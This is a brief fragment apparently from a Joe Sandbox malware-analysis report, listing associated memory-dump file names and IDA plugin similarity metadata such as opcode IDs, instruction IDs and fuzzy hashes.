                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $$@
                                                                • API String ID: 0-1194432280
                                                                • Opcode ID: 86c1f99f116718411e33d85c0003f0068913d228b86b9bae4e9a19426816fbc8
                                                                • Instruction ID: 62410d381c727ea0943dc8e70ffa2ce102f8e41d8851e62ddde045b96e27b878
                                                                • Opcode Fuzzy Hash: 86c1f99f116718411e33d85c0003f0068913d228b86b9bae4e9a19426816fbc8
                                                                • Instruction Fuzzy Hash: 8E813C75D012699FDB21DF94CC44BEAB7B8AB48750F0445EAEA19BB280D7305E84CFA0